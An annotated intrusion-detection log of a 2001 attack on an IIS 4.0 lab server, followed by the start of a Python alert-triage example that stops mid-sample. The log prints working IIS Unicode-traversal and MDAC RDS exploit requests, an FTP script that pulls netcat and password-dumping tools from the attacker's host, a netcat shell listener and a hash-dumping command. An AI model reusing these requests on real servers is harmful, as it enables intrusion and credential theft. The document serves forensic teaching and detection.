02/04-05:41:19.638247 213.116.251.162:1876 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11799 IpLen:20 DgmLen:368 DF
***AP*** Seq: 0x9CE70E10 Ack: 0x2CBD4A0C Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1
.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-A
live....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:19.678605 172.16.1.106:80 -> 213.116.251.162:1876
TCP TTL:127 TOS:0x0 ID:60280 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD4A0C Ack: 0x9CE70F58 Win: 0x20F0 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:15 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:29.810682 213.116.251.162:1877 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11808 IpLen:20 DgmLen:369 DF
***AP*** Seq: 0x9D0E32B4 Ack: 0x2CBD71CB Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/
1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Window
s NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-
Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:29.851630 172.16.1.106:80 -> 213.116.251.162:1877
TCP TTL:127 TOS:0x0 ID:61816 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD71CB Ack: 0x9D0E33FD Win: 0x20EF TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:25 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:39.973817 213.116.251.162:1879 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11822 IpLen:20 DgmLen:371 DF
***AP*** Seq: 0x9D363D8B Ack: 0x2CBD99A8 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+nc.exe+>>ftpcom HTT
P/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzi
p, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Wind
ows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Kee
p-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:40.013513 172.16.1.106:80 -> 213.116.251.162:1879
TCP TTL:127 TOS:0x0 ID:63096 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD99A8 Ack: 0x9D363ED6 Win: 0x20ED TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:35 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:50.116582 213.116.251.162:1880 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11830 IpLen:20 DgmLen:374 DF
***AP*** Seq: 0x9D5D8AB0 Ack: 0x2CBDC148 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+pdump.exe+>>ftpcom
HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:50.155871 172.16.1.106:80 -> 213.116.251.162:1880
TCP TTL:127 TOS:0x0 ID:64632 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBDC148 Ack: 0x9D5D8BFE Win: 0x20EA TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:45 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:00.324156 213.116.251.162:1881 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11838 IpLen:20 DgmLen:376 DF
***AP*** Seq: 0x9D853285 Ack: 0x2CBDE907 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+samdump.dll+>>ftpco
m HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding
: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection
: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:00.363806 172.16.1.106:80 -> 213.116.251.162:1881
TCP TTL:127 TOS:0x0 ID:377 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBDE907 Ack: 0x9D8533D5 Win: 0x20E8 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:55 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The purpose of the script is the same as before.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:10.544150 213.116.251.162:1882 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11847 IpLen:20 DgmLen:365 DF
***AP*** Seq: 0x9DACA7DA Ack: 0x2CBE10F7 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1.
.Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, def
late..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Aliv
e....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:10.583546 172.16.1.106:80 -> 213.116.251.162:1882
TCP TTL:127 TOS:0x0 ID:1913 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBE10F7 Ack: 0x9DACA91F Win: 0x20F3 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:41:06 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to kick off the FTP script
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:21.001718 213.116.251.162:1885 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11861 IpLen:20 DgmLen:360 DF
***AP*** Seq: 0x9DD68A8F Ack: 0x2CBE39CF Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1..Acce
pt: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate.
.User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0;
Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:22.623716 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11869 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x9DDB0EF4 Ack: 0x2CBE3D0D Win: 0x2238 TcpLen: 20
220-Serv-U FTP-Server v2.5h for WinSock ready.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.271644 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11871 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x9DDB0F26 Ack: 0x2CBE3D0D Win: 0x2238 TcpLen: 20
220--------H-A-C-K T-H-E P-L-A-N-E-T--------..220-W3|_c0m3 T0
JohnA's 0d4y Ef-Tee-Pee S3rv3r...220-Featuring 100% elite hax0r
warez!@$#@..220-Im running win 95 (Release candidate 1), on a p3
3, with 16mb Ram...220 -------H-A-C-K T-H-E P-L-A-N-E-T-------
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.295141 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4217 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x2CBE3D0D Ack: 0x9DDB1029 Win: 0x2103 TcpLen: 20
USER johna2k ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.671412 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11872 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x9DDB1029 Ack: 0x2CBE3D1C Win: 0x2229 TcpLen: 20
331 User name okay, need password...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.676158 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4729 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x2CBE3D1C Ack: 0x9DDB104D Win: 0x20DF TcpLen: 20
PASS haxedj00..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# And this time it works
[**] FTP control channel [**]
02/04-05:42:24.138966 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11874 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB104D Ack: 0x2CBE3D2B Win: 0x221A TcpLen: 20
230 User logged in, proceed...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.147396 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4985 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D2B Ack: 0x9DDB106B Win: 0x20C1 TcpLen: 20
PORT 172,16,1,106,12,71..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.517966 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11875 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB106B Ack: 0x2CBE3D44 Win: 0x2200 TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.522065 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:5241 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBE3D44 Ack: 0x9DDB1089 Win: 0x20A3 TcpLen: 20
RETR nc.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.981244 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11877 IpLen:20 DgmLen:106 DF
***AP*** Seq: 0x9DDB1089 Ack: 0x2CBE3D51 Win: 0x21F3 TcpLen: 20
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.518867 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11925 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB10CB Ack: 0x2CBE3D51 Win: 0x21F3 TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.542160 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:16249 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D51 Ack: 0x9DDB10E3 Win: 0x2049 TcpLen: 20
PORT 172,16,1,106,12,72..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.895562 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11927 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB10E3 Ack: 0x2CBE3D6A Win: 0x21D9 TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.899645 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:16505 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBE3D6A Ack: 0x9DDB1101 Win: 0x202B TcpLen: 20
RETR pdump.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:38.303599 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11929 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0x9DDB1101 Ack: 0x2CBE3D7A Win: 0x21C9 TcpLen: 20
150 Opening ASCII mode data connection for pdump.exe (32768 byte
s)...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# As soon as netcat is downloaded (but before the other files complete), the intruder uses the Unicode vulnerability
!@# to start an instance of netcat listening on port 6969, using the -e flag to pipe its input to cmd1.exe.
!@# The intruder would then need to run a command something like 'nc 172.16.1.106 6969' on their end.
!@# NOTE: this instance of cmd1.exe will be running with the same privileges as the web server.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:42.787971 213.116.251.162:1887 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11951 IpLen:20 DgmLen:372 DF
***AP*** Seq: 0x9E2701A1 Ack: 0x2CBE8B7D Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HT
TP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gz
ip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Win
dows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Ke
ep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.346161 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11967 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB1146 Ack: 0x2CBE3D7A Win: 0x21C9 TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.360871 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:23417 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D7A Ack: 0x9DDB115E Win: 0x1FCE TcpLen: 20
PORT 172,16,1,106,12,73..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.795847 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11973 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB115E Ack: 0x2CBE3D93 Win: 0x21AF TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.800036 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:23673 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0x2CBE3D93 Ack: 0x9DDB117C Win: 0x1FB0 TcpLen: 20
RETR samdump.dll..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:47.228807 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11975 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x9DDB117C Ack: 0x2CBE3DA5 Win: 0x219D TcpLen: 20
150 Opening ASCII mode data connection for samdump.dll (36864 by
tes)...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Intruder gets a remote console 'C:\Program Files\Common Files\system\msadc>'
[**] netcat session 6969 [**]
02/04-05:42:49.263766 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25465 IpLen:20 DgmLen:155 DF
***AP*** Seq: 0x2CBEA4C2 Ack: 0x9E43FB19 Win: 0x2238 TcpLen: 20
Microsoft(R) Windows NT(TM)..(C) Copyright 1985-1996 Microsoft C
orp.....C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:55.236504 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:12008 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB11C3 Ack: 0x2CBE3DA5 Win: 0x219D TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:55.244260 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:31097 IpLen:20 DgmLen:46 DF
***AP*** Seq: 0x2CBE3DA5 Ack: 0x9DDB11DB Win: 0x1F51 TcpLen: 20
QUIT..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP session ends '221 Buh bye, you secksi hax0r j00 :]'
[**] FTP control channel [**]
02/04-05:42:55.628742 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:12010 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x9DDB11DB Ack: 0x2CBE3DAB Win: 0x2197 TcpLen: 20
221 Buh bye, you secksi hax0r j00 :]..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:55.648760 172.16.1.106:80 -> 213.116.251.162:1885
TCP TTL:127 TOS:0x0 ID:31609 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBE39CF Ack: 0x9DD68BCF Win: 0x20F8 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:41:51 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:31.075053 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34169 IpLen:20 DgmLen:240 DF
***AP*** Seq: 0x2CBEA535 Ack: 0x9E43FB1E Win: 0x2233 TcpLen: 20
dir.. Volume in drive C has no label... Volume Serial Number is
8403-6A0E.... Directory of C:\Program Files\Common Files\system\
msadc....02/04/01 06:41a ...02/04/01 06:
41a
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] netcat session 6969 [**]
02/04-05:43:31.655576 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:34425 IpLen:20 DgmLen:959 DF
***AP*** Seq: 0x2CBEA5FD Ack: 0x9E43FB1E Win: 0x2233 TcpLen: 20
....09/25/97 07:41a 596 adc
javas.inc..09/25/97 07:41a 589 adcvbs.inc..04
/30/97 11:00p 208,144 cmd1.exe..02/04/01 06:41a
98 ftpcom..09/25/97 08:28a 172
,816 msadce.dll..09/25/97 08:16a 5,632 msadcer.
dll..09/25/97 08:24a 23,312 msadcf.dll..09/25/97
08:24a 91,408 msadco.dll..09/25/97 08:19a
5,120 msadcor.dll..09/26/97 08:19a 4
2,256 msadcs.dll..02/04/01 06:41a 59,392 nc.exe.
.02/04/01 06:41a 32,768 pdump.exe..10/02/97 07:
28a 19,388 readme.txt..02/04/01 06:41a
36,864 samdump.dll.. 16 File(s) 698,38
3 bytes.. 1,690,861,056 bytes free....C
:\Program Files\Common Files\system\msadc>..C:\Program Files\Com
mon Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to execute pdump and append output to file 'yay.txt'. This will give him/her the password hashes for a cracking tool later.
!@# NOTE: Commands run using the MDAC vulnerability will execute with system privileges
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:43:52.580779 213.116.251.162:1891 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:12037 IpLen:20 DgmLen:831 DF
***AP*** Seq: 0x9F3A4F1C Ack: 0x2CBF9EC4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 637..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 428..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .C
.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.s.y.s
.t.e.m.\.m.s.a.d.c.\.p.d.u.m.p...e.x.e. .>.>.y.a.y...t.x.t.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
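As an added defender-side example (not part of the original analysis), the following Python triage pass works over alert records in the layout used throughout this capture. It parses the `[**] rule [**]` header, the packet line and the wrapped payload, tags the Unicode-traversal requests that run commands through `cmd1.exe?/c+` (including the one above that starts the netcat listener, so the listening port can be pulled out for host-side checking), tags the RDS `AdvancedDataFactory.Query` POST whose UTF-16LE body carries `|shell(`, and rebuilds the `ftpcom` script from the `echo ... >>ftpcom` requests. The four sample records are constructed in the shape of this capture (headers trimmed); the rule names, tag strings and regexes are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed sample: four records in the shape of this capture (alert header,
# packet line, IP line, TCP flags line, payload with '.' for non-printables).
SAMPLE_LOG = """\
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:00.324156 213.116.251.162:1881 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11838 IpLen:20 DgmLen:376 DF
***AP*** Seq: 0x9D853285 Ack: 0x2CBDE907 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1..Host: lab.wiretrip.net....
=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:10.544150 213.116.251.162:1882 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11847 IpLen:20 DgmLen:365 DF
***AP*** Seq: 0x9DACA7DA Ack: 0x2CBE10F7 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files/system/msadc/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1..Host: lab.wiretrip.net....
=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:42.787971 213.116.251.162:1887 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11951 IpLen:20 DgmLen:372 DF
***AP*** Seq: 0x9E2701A1 Ack: 0x2CBE8B7D Win: 0x2238 TcpLen: 20
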